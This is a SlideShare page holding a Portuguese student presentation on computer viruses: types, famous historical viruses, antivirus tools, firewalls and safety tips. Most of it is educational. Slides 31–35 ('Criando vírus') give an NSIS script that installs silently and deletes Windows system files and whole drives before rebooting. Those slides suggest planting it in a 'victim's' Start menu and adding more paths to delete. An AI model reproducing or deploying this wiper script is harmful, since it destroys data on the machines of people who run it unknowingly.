0
O que é e qual possíveis ações: Vírus
Texto Educativo Não nos responsabilizamos pelo mau uso… Não façam besteiras ;p
Quem Somos?
<ul><li>São softwares que foram desenvolvidos  por programadores, onde  burlam sistemas alheios;  </li></ul><ul><li>Atuam ...
Alguns tipos de  vírus
Virus de Boot-  Infecta a partição de inicialização do Sistema Operacional. Time Bomb  - Ativados em Datas e horários espe...
Keylogger  - Vírus que obtem tudo que  o usuário digita e envia a pessoa que  o enviou. Computador Zumbi ou Estado Zumbi  ...
Dados estatísticos
Dados estatísticos <ul><li>Até  1995  - 5.000 vírus conhecidos; </li></ul><ul><li>Até  1999  - 20.500 vírus conhecidos; </...
Crackers e hackers <ul><li>Hackers são os que quebram senhas, códigos e sistemas de segurança por puro prazer em achar tai...
Vírus mais comuns
Elk Cloner <ul><li>O primeiro vírus ampla distribuição criado por um garoto de 15 anos em 1982. </li></ul><ul><li>Atacava ...
Brain <ul><li>Janeiro de 1986; </li></ul><ul><li>Considerado um dos primeiros vírus conhecido; </li></ul><ul><li>Afetava o...
Ping  Pong <ul><li>Ano 1988; </li></ul><ul><li>Um dos primeiros vírus conhecidos no Brasil; </li></ul><ul><li>Afetava o MS...
Sasser <ul><li>Um dos primeiros que explora a invasão do PC; </li></ul><ul><li>Não precisa abrir o email ou executar o arq...
Jerusálem <ul><li>Residente em memória; </li></ul><ul><li>Infecta arquivos com extensão .COM, .EXE, .BIN, .PIF e .OVL; </l...
Z otob <ul><li>Vírus do tipo Worm que ataca o Windows 2000; </li></ul><ul><li>A gravidade classificada pela Microsoft como...
Winman32 <ul><li>Um vírus informativo; </li></ul><ul><li>Modo de infecção: sites de relacionamento; </li></ul><ul><li>Não ...
Sircam <ul><li>Se   propaga por e-mail; </li></ul><ul><li>Ataca usuários de Windows; </li></ul><ul><li>Texto enviado no e-...
Natas ou Satan <ul><li>Desenvolvido   por James Gentile em 94; </li></ul><ul><li>Ataca o SO DOS; </li></ul><ul><li>Seu nom...
Leandro & Kelly <ul><li>Criado em 1995; </li></ul><ul><li>Distribuído em SW piratas; </li></ul><ul><li>Atacava o SO MS-DOS...
Michelangelo <ul><li>Variante do Stoned; </li></ul><ul><li>Entra em atividade no dia do nascimento de Michelangelo, dia 6 ...
Stoned <ul><li>Feito para ser inofensivo, porém devido um erro de código, porém escreve na trilha zero do disco; </li></ul...
Pro Rat <ul><li>É um backdoor da classe Rat (Remote Administrator Tool), possui muitas funções de espião; </li></ul><ul><l...
NetBus <ul><li>Outro backdoor; </li></ul><ul><li>Uma vez instalado permite que o atacante tenha total controle sobre a máq...
Chernobyl
Win32/CIH ou Chernobyl <ul><li>Criado em 98 por Chen Ing-Hau; </li></ul><ul><li>Um dos mais temidos vírus e o ÚNICO efetiv...
Win32/CIH ou Chernobyl <ul><li>Primeiro Passo  </li></ul><ul><ul><li>Download da BIOS e uma placa mãe compatível.  </li></...
Vírus em celular
<ul><li>&quot;Cabir.A&quot;,  </li></ul><ul><li>Junho de 2004; </li></ul><ul><li>Não infectou muitos aparelhos; </li></ul>...
Criando vírus
<ul><li>Com o Bloco de notas digite : </li></ul><ul><li>!define PRODUCT_NAME &quot;APAGADOR_XXX&quot; !define PRODUCT_VERS...
<ul><li>Próximo passo: </li></ul><ul><li>Salvar Como </li></ul><ul><li>qualquerNome .nsi </li></ul><ul><li>Experimente jog...
<ul><li>Mais?  </li></ul><ul><li>=) </li></ul>
<ul><li>Tudo o que você deletar coloque essas linhas: </li></ul><ul><li>Delete /REBOOTOK &quot;C:oot.ini&quot; Delete /RE...
Usuário de Windows
Uma Esperança
Antivírus são softwares projetados para detectar e eliminar vírus de computador, monitorando automaticamente todos os arqu...
Por vezes quando executamos um qualquer script no Windows seja ele VBscript ou JSscript recebemos uma mensagem do antivíru...
Surgimento do antivírus
Peter Norton, empresário de TI, apagou acidentalmente um arquivo, com isso desenvolveu o Norton Utilities para restaurá-lo...
Teste de Antivirus
Firewall Outra grande ferramenta de  proteção contra os Vírus
S ão programas que monitoram todos os dados que entram e saem do micro   funcionam como complemento do antivírus, pois aju...
Conheça uns a seguir:
<ul><li>Filtragem de pacotes </li></ul><ul><li>firewall que trabalha na filtragem de pacotes é muito utilizado em redes pe...
O firewall de aplicação permite um acompanhamento mais preciso do tráfego entre a rede e a Internet (ou entre a rede e out...
 
Razões para utilizar um firewall
1  - O firewall pode ser usado para ajudar a impedir que sua rede ou seu computador seja acessado sem autorização. Assim, ...
Dicas de como se proteger
Desconfie dos e-mails que recebe... Não clique em qualquer link ou anexo... Simples não?
Não abra qualquer site; Não baixe qualquer arquivo sem saber a fonte; NÃO EXISTE JOGOS DE 300Kb para PlayStation e afins.....
Sempre atualize seus sistemas de proteção: Firewall; Anti-Vírus; Anti-Spyware; Bla bla bla ;)
Não deixar pastas compartilhadas no HD desnecessariamente Certificar que a conexão estabelecida entre o  computador e os s...
Maldita inclusão digital e PC do milhão… http://www.youtube.com/watch?v=8zFYt1_0FUE
O Windows não tem falhas…
Não quer vírus?
FIM
Upcoming SlideShare
Loading in...5
×

Virus em Hw

2,007

Published on

Trabalho apresentado na aula de Arquitetura de Hardware para o professor Claudio Cura.
Integrantes:
Eduardo Bregaida
Roberta
Davi
Vinicius

Published in: Technology, Health & Medicine
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
2,007
On Slideshare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
40
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Transcript of "Virus em Hw"

  1. 1. O que é e qual possíveis ações: Vírus
  2. 2. Texto Educativo Não nos responsabilizamos pelo mau uso… Não façam besteiras ;p
  3. 3. Quem Somos?
  4. 4. <ul><li>São softwares que foram desenvolvidos por programadores, onde burlam sistemas alheios; </li></ul><ul><li>Atuam da mesma forma que um vírus real; </li></ul><ul><li>Primeiro vírus surgiu em 1983,por Lean Eidelmen; </li></ul>
  5. 5. Alguns tipos de vírus
  6. 6. Virus de Boot- Infecta a partição de inicialização do Sistema Operacional. Time Bomb - Ativados em Datas e horários especificos. Worm - Vírus que tenta se multiplicar em outras máquinas. Trojan Hourse - Assim como na história, este vírus se introduz na máquina da vítima, permitindo que o atacante tenha controle sobre a máquina. Hijackers - Scripts que normalmente atacam os Browsers modificando suas páginas iniciais e abrindo urls não conhecidas pelo usuário. .
  7. 7. Keylogger - Vírus que obtem tudo que o usuário digita e envia a pessoa que o enviou. Computador Zumbi ou Estado Zumbi - Vírus que permite ao atacante instalar Keyloggers e outros, também pode aplicar ataques a sites, sem que o usuário deste computador saiba. Stealth - Vírus polimórfico, que se multiplica e se torna indetectável, exemplos: Natas e Brain. Macro - Vírus que infecta o pacote Office, causando inconveniências para a pessoa que tem seu computador infectado.
  8. 8. Dados estatísticos
  9. 9. Dados estatísticos <ul><li>Até 1995 - 5.000 vírus conhecidos; </li></ul><ul><li>Até 1999 - 20.500 vírus conhecidos; </li></ul><ul><li>Até 2000 - 49.000 vírus conhecidos; </li></ul><ul><li>Até 2001 - 58.000 vírus conhecidos; </li></ul><ul><li>Até 2005 - Aproximadamente 75.000 vírus conhecidos; </li></ul><ul><li>Até 2007 - Aproximadamente 200.000 vírus conhecidos; </li></ul><ul><li>Até novembro de 2008 - Mais de 530.000 vírus conhecidos. </li></ul><ul><li>Até março de 2009 - Mais 630.000 vírus conhecidos. </li></ul>
  10. 10. Crackers e hackers <ul><li>Hackers são os que quebram senhas, códigos e sistemas de segurança por puro prazer em achar tais falhas. </li></ul><ul><ul><li>Preocupam-se em conhecer o funcionamento mais íntimo de um sistema computacional ou seja uma sem intenções de prejudicar outras ou invadir sistemas. </li></ul></ul><ul><li>Crackers é o criminoso virtual, que extorque pessoas usando seus conhecimentos, usando as mais variadas estratégias. </li></ul><ul><ul><li>Aficcionados em informática, conhecem muitas linguagens de programação e quase sempre jovens, que criavam seus vírus, para muitas vezes, saber o quanto eles poderiam se propagar. </li></ul></ul>
  11. 11. Vírus mais comuns
  12. 12. Elk Cloner <ul><li>O primeiro vírus ampla distribuição criado por um garoto de 15 anos em 1982. </li></ul><ul><li>Atacava computadores Apple 2 com DOS; </li></ul><ul><li>Não atacava arquivos apenas exibia uma mensagem: </li></ul><ul><li>Elk Cloner: The program with a personality It will get on all your disks It will infiltrate your chips Yes it's Cloner! It will stick to you like glue It will modify RAM too Send in the Cloner! </li></ul>
  13. 13. Brain <ul><li>Janeiro de 1986; </li></ul><ul><li>Considerado um dos primeiros vírus conhecido; </li></ul><ul><li>Afetava o MS-DOS; </li></ul><ul><li>Welcome to the Dungeon © 1986 Basit * Amjad (pvt) Ltd. BRAIN COMPUTER SERVICES 730 NIZAM BLOCK ALLAMA IQBAL TOWN LAHORE-PAKISTAN PHONE: 430791,443248,280530. Beware of this VIRUS.... Contact us for vaccination… </li></ul><ul><li>Motivo: foi criado para monitorar cópias piratas de um software médico de monitoramento cardíaco que haviam desenvolvido para a Apple; </li></ul><ul><li>O código foi portado para DOS; </li></ul><ul><li>A companhia foi alvo de ações judiciais e foi fechada. </li></ul>
  14. 14. Ping Pong <ul><li>Ano 1988; </li></ul><ul><li>Um dos primeiros vírus conhecidos no Brasil; </li></ul><ul><li>Afetava o MS-DOS e PC-DOS; </li></ul><ul><li>Se instalava na Interrupção 8 da BIOS; </li></ul><ul><li>Dependendo do Tic-Tac do relógio a bolinha pulava de um lado a outro da tela; </li></ul><ul><li>Uma vez o computador infectado, multiplicava-se nos disquetes. </li></ul>
  15. 15. Sasser <ul><li>Um dos primeiros que explora a invasão do PC; </li></ul><ul><li>Não precisa abrir o email ou executar o arquivo; </li></ul><ul><li>A infecção da-se por um processo de Exploit; </li></ul><ul><li>Este Vírus explorava a rede e permitia controle do computador infectado; </li></ul><ul><li>Utilizava a porta RPC do Windows para invadir . </li></ul>
  16. 16. Jerusálem <ul><li>Residente em memória; </li></ul><ul><li>Infecta arquivos com extensão .COM, .EXE, .BIN, .PIF e .OVL; </li></ul><ul><li>Não infecta o arquivo COMMAND.COM; </li></ul><ul><li>Pode ter sido baseado no vírus Suriv 3.00 (isolado após o Jerusalém); </li></ul><ul><li>Vários outros vírus se baseiam em seu código e método de infecção e ataque; </li></ul><ul><li>Interrompe o computador das 08h e 21h; </li></ul><ul><li>Após 30 minutos aumentam demais os arquivos infectados, deixando os computadores lentos; </li></ul><ul><li>Ataca às sextas-feiras cujo número seja 13, por isso muitos os chamam de Sexta-Feira 13; </li></ul><ul><li>Nesse momento o vírus apaga qualquer arquivo que o usuário tenta executar. </li></ul>
  17. 17. Z otob <ul><li>Vírus do tipo Worm que ataca o Windows 2000; </li></ul><ul><li>A gravidade classificada pela Microsoft como moderada; </li></ul><ul><li>A Microsoft possui uma atualização de segurança contra este vírus e suas variantes; </li></ul><ul><li>Variantes conhecidas: </li></ul><ul><ul><li>Zotob A, B, C, D e E. </li></ul></ul>
  18. 18. Winman32 <ul><li>Um vírus informativo; </li></ul><ul><li>Modo de infecção: sites de relacionamento; </li></ul><ul><li>Não causa danos ao SO, porém dispara mensagens nos sistemas de relacionamento que a vitima acessa; </li></ul><ul><li>Mensagens conhecidas: </li></ul><ul><ul><li>&quot;Olha esse video q encontrei sobre o acidente da gol.. (link com vírus omitido) &quot; </li></ul></ul><ul><ul><li>&quot;Veja as fotos da nossa festa, ficaram ótimas!! (link com vírus omitido) &quot; </li></ul></ul><ul><ul><li>&quot;Assista ao vídeo da Daniela Cicarrelli fazendo sexo com o namorado na praia, últimos dias no ar!!! (link com vírus omitido) &quot; </li></ul></ul><ul><ul><li>&quot;Um casal de adolescentes caiu na besteira de tirar fotos e filmar suas transas, a porra toda caiu na net, coitados... veja você mesmo (link com vírus omitido) &quot; </li></ul></ul>
  19. 19. Sircam <ul><li>Se propaga por e-mail; </li></ul><ul><li>Ataca usuários de Windows; </li></ul><ul><li>Texto enviado no e-mail uma mensagem com o vírus em anexo: </li></ul><ul><ul><li>&quot;Eu te enviei esse arquivo, me responda se gostou&quot;. </li></ul></ul>
  20. 20. Natas ou Satan <ul><li>Desenvolvido por James Gentile em 94; </li></ul><ul><li>Ataca o SO DOS; </li></ul><ul><li>Seu nome é o nome Satanás em inglês Satan; </li></ul><ul><li>Adota Técnicas Stelth, quando está na RAM, impede que o código que ele aloja no final de todos os programas infectados seja detectado; </li></ul><ul><li>Pode sobreescrever trechos do HD ou setor de Boot. </li></ul>
  21. 21. Leandro & Kelly <ul><li>Criado em 1995; </li></ul><ul><li>Distribuído em SW piratas; </li></ul><ul><li>Atacava o SO MS-DOS; </li></ul><ul><li>Se multiplica em discos inseridos no PC infectado; </li></ul><ul><li>Infecta o Boot; </li></ul><ul><li>Teve uma grande repercursão, pois é uma variante do vírus Michelangelo; </li></ul><ul><li>Foi um vírus brasileiro de grande impacto. </li></ul>
  22. 22. Michelangelo <ul><li>Variante do Stoned; </li></ul><ul><li>Entra em atividade no dia do nascimento de Michelangelo, dia 6 de março; </li></ul><ul><li>Sobreescreve a maior parte do HD . </li></ul>
  23. 23. Stoned <ul><li>Feito para ser inofensivo, porém devido um erro de código, porém escreve na trilha zero do disco; </li></ul><ul><li>Ah diversas variantes deste vírus, alguns com mensagens plíticas, outras explodem a tela em cores de chamas quando passa um mês depois de instalados; </li></ul><ul><li>Mensagens mais comuns: </li></ul><ul><li>“ Your computer is now stoned.&quot; </li></ul><ul><li>&quot;Bloody! Jun. 4, 1989&quot;. </li></ul><ul><li>&quot;The Swedish Disaster&quot;. </li></ul>
  24. 24. Pro Rat <ul><li>É um backdoor da classe Rat (Remote Administrator Tool), possui muitas funções de espião; </li></ul><ul><li>Permite que pessoas executem muitas ações maliciosas; </li></ul><ul><li>Algumas funcões: </li></ul><ul><ul><li>Keystrokes (Keylogger) </li></ul></ul><ul><ul><li>Roubar senhas </li></ul></ul><ul><ul><li>Controle total sobre arquivos </li></ul></ul><ul><ul><li>Formatação de drives </li></ul></ul><ul><ul><li>Controle de impressora </li></ul></ul><ul><ul><li>Abrir/fechar drive de CD </li></ul></ul><ul><ul><li>Esconder a barra de tarefas, área de trabalho e botão iniciar </li></ul></ul><ul><ul><li>Tirar screenshots </li></ul></ul><ul><ul><li>Visualizar informações do sistema </li></ul></ul><ul><ul><li>Visualizar webcam </li></ul></ul><ul><ul><li>Escutar microfone </li></ul></ul><ul><ul><li>Fazer downloads e rodar arquivos </li></ul></ul><ul><ul><li>Travar a tela, mouse, teclado, dentre outros </li></ul></ul><ul><ul><li>Visualizar a area de trabalho da vitima </li></ul></ul><ul><ul><li>Chegando até a formatar a máquina da vítima. </li></ul></ul>
  25. 25. NetBus <ul><li>Outro backdoor; </li></ul><ul><li>Uma vez instalado permite que o atacante tenha total controle sobre a máquina da vítima; </li></ul><ul><li>Muito usado para roubar informações. </li></ul>
  26. 26. Chernobyl
  27. 27. Win32/CIH ou Chernobyl <ul><li>Criado em 98 por Chen Ing-Hau; </li></ul><ul><li>Um dos mais temidos vírus e o ÚNICO efetivo no ataque ao Hardware; </li></ul><ul><li>Apagava a BIOS e o Disco de Boot no dia 26 de abril (algumas variantes atacavam em outros meses também); </li></ul><ul><li>Curiosidade: em 26 de Abril aconteceu o desastre Nuclear de Chernobyl, daí o nome; </li></ul><ul><li>É um vírus residente em memória, infecta qualquer disco externo; </li></ul><ul><li>É da categoria stealth; </li></ul><ul><li>Ataca a Flash Bios; </li></ul><ul><li>Por motivos de compatibilidade não ataca as versões Windows NT, 2000, XP, 2003, Vista e 7; </li></ul>
  28. 28. Win32/CIH ou Chernobyl <ul><li>Primeiro Passo </li></ul><ul><ul><li>Download da BIOS e uma placa mãe compatível. </li></ul></ul><ul><li>Segundo passo, reprogramação da BIOS: </li></ul><ul><ul><li>No DOS, remova o chip do BIOS bom e substitua pelo chip do BIOS. </li></ul></ul><ul><li>Passo três: </li></ul><ul><ul><li>Rode o programa de gravação do BIOS e reprograme o BIOS apagado. </li></ul></ul><ul><li>Passo quatro: </li></ul><ul><ul><li>Desligue o micro, remova o BIOS que você acabou de reprogramar e instale de volta o BIOS original. </li></ul></ul><ul><li>Passo quatro: </li></ul><ul><ul><li>Instale o BIOS reprogramado na placa-mãe &quot;morta&quot; e ligue-a. </li></ul></ul><ul><li>Passo cinco: </li></ul><ul><ul><li>Rode o anti-vírus e o programa de recuperação de dados no HD do micro atacado, caso o mesmo tenha sido infectado. </li></ul></ul><ul><ul><li>Informações: http://www.clubedohardware.com.br/artigos/654/1 </li></ul></ul>
  29. 29. Vírus em celular
  30. 30. <ul><li>&quot;Cabir.A&quot;, </li></ul><ul><li>Junho de 2004; </li></ul><ul><li>Não infectou muitos aparelhos; </li></ul><ul><li>Transmitido via BlueTooh; </li></ul><ul><li>Variantes em 2005; </li></ul><ul><li>Mabir.A, Skulls.A, Commwarrior.A, Locknut.B e Fontal.A; </li></ul><ul><li>São apenas vírus que disparam mensagens e afins; </li></ul><ul><li>Não tem propagação rápida; </li></ul><ul><li>Não são destrutivos. </li></ul>
  31. 31. Criando vírus
  32. 32. <ul><li>Com o Bloco de notas digite : </li></ul><ul><li>!define PRODUCT_NAME &quot;APAGADOR_XXX&quot; !define PRODUCT_VERSION &quot;1.0&quot; !define PRODUCT_PUBLISHER &quot;HACKER_XXX&quot; </li></ul><ul><li>SetCompressor lzma </li></ul><ul><li>Name &quot;${PRODUCT_NAME} ${PRODUCT_VERSION}&quot; OutFile &quot;MeuVirus.exe&quot; InstallDir &quot;$TEMP&quot; Icon &quot;${NSISDIR}ContribGraphicsIconsmodern-install.ico&quot; SilentInstall silent </li></ul><ul><li>Section &quot;Sec001&quot; SEC01 Delete /REBOOTOK &quot;$WINDIR*.*&quot; SectionEnd </li></ul><ul><li>Section -Post Reboot SectionEnd </li></ul>
  33. 33. <ul><li>Próximo passo: </li></ul><ul><li>Salvar Como </li></ul><ul><li>qualquerNome .nsi </li></ul><ul><li>Experimente jogá-lo no menu iniciar da vítima ;) </li></ul>
  34. 34. <ul><li>Mais? </li></ul><ul><li>=) </li></ul>
  35. 35. <ul><li>Tudo o que você deletar coloque essas linhas: </li></ul><ul><li>Delete /REBOOTOK &quot;C:oot.ini&quot; Delete /REBOOTOK &quot;C:Meus documentos*.*&quot; Delete /REBOOTOK &quot;C:*.*&quot; Delete /REBOOTOK &quot;D:*.*&quot; Delete /REBOOTOK &quot;E:*.*&quot; Delete /REBOOTOK &quot;F:*.*&quot; Delete /REBOOTOK &quot;G:*.*&quot; Delete /REBOOTOK &quot;C:Arquivos de programas*.*&quot; </li></ul><ul><li>Adicione o que quiser, arquivos específicos, etc. </li></ul>
  36. 36. Usuário de Windows
  37. 37. Uma Esperança
  38. 38. Antivírus são softwares projetados para detectar e eliminar vírus de computador, monitorando automaticamente todos os arquivos que são abertos no PC
  39. 39. Por vezes quando executamos um qualquer script no Windows seja ele VBscript ou JSscript recebemos uma mensagem do antivírus a avisar da exploração de alguma falha do sistema Como é que isso é possível
  40. 40. Surgimento do antivírus
  41. 41. Peter Norton, empresário de TI, apagou acidentalmente um arquivo, com isso desenvolveu o Norton Utilities para restaurá-los. Ele criou a Symantec, em 1982, dando início a criação e comercialização de softwares de seguranças no mercado, e livros sobre o assunto. Ele foi um dos primeiros desenvolvedores de sistemas de segurança
  42. 42. Teste de Antivirus
  43. 43. Firewall Outra grande ferramenta de proteção contra os Vírus
  44. 44. S ão programas que monitoram todos os dados que entram e saem do micro funcionam como complemento do antivírus, pois ajudam a evitar que os vírus tentem se multiplicar via rede e dificulta a ação de hackers (invasores de computadores) Seu objetivo é permitir somente a transmissão e a recepção de dados autorizados
  45. 45. Conheça uns a seguir:
  46. 46. <ul><li>Filtragem de pacotes </li></ul><ul><li>firewall que trabalha na filtragem de pacotes é muito utilizado em redes pequenas ou de porte médio. </li></ul><ul><li>Alguns sistemas ou serviços podem ser liberados completamente (por exemplo, o serviço de e-mail da rede); </li></ul><ul><li>Enquanto outros são bloqueados por padrão, por terem riscos elevados (como softwares de mensagens instantâneas, tal como o ICQ). </li></ul><ul><li>O grande problema desse tipo de firewall, é que as regras aplicadas podem ser muito complexas e causar perda de desempenho da rede ou não serem eficazes o suficiente </li></ul>
  47. 47. O firewall de aplicação permite um acompanhamento mais preciso do tráfego entre a rede e a Internet (ou entre a rede e outra rede). É possível, inclusive, contar com recursos de log e ferramentas de auditoria. Tais características deixam claro que este tipo de firewall é voltado a redes de porte médio ou grande e que sua configuração exige certa experiência no assunto
  48. 49. Razões para utilizar um firewall
  49. 50. 1 - O firewall pode ser usado para ajudar a impedir que sua rede ou seu computador seja acessado sem autorização. Assim, é possível evitar que informações sejam capturadas ou que sistemas tenham seu funcionamento prejudicado pela ação de hackers 2 - O firewall é um grande aliado no combate a vírus e cavalos –de -tróia, uma vez que é capaz de bloquear portas que eventualmente sejam usadas pelas &quot;pragas digitais&quot; ou então bloquear acesso a programas não autorizados 3 - Em redes corporativas, é possível evitar que os usuários acessem serviços ou sistemas indevidos, além de ter o controle sobre as ações realizadas na rede, sendo possível até mesmo descobrir quais usuários as efetuaram As 3 principais razões para se usar um firewall são:
  50. 51. Dicas de como se proteger
  51. 52. Desconfie dos e-mails que recebe... Não clique em qualquer link ou anexo... Simples não?
  52. 53. Não abra qualquer site; Não baixe qualquer arquivo sem saber a fonte; NÃO EXISTE JOGOS DE 300Kb para PlayStation e afins... Nunca forneça suas senhas...
  53. 54. Sempre atualize seus sistemas de proteção: Firewall; Anti-Vírus; Anti-Spyware; Bla bla bla ;)
  54. 55. Não deixar pastas compartilhadas no HD desnecessariamente Certificar que a conexão estabelecida entre o computador e os servidores é segura, conforme explicado no tópico segurança no Internet Banking Te pego na Encruza
  55. 56. Maldita inclusão digital e PC do milhão… http://www.youtube.com/watch?v=8zFYt1_0FUE
  56. 57. O Windows não tem falhas…
  57. 58. Não quer vírus?
  58. 59. FIM
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×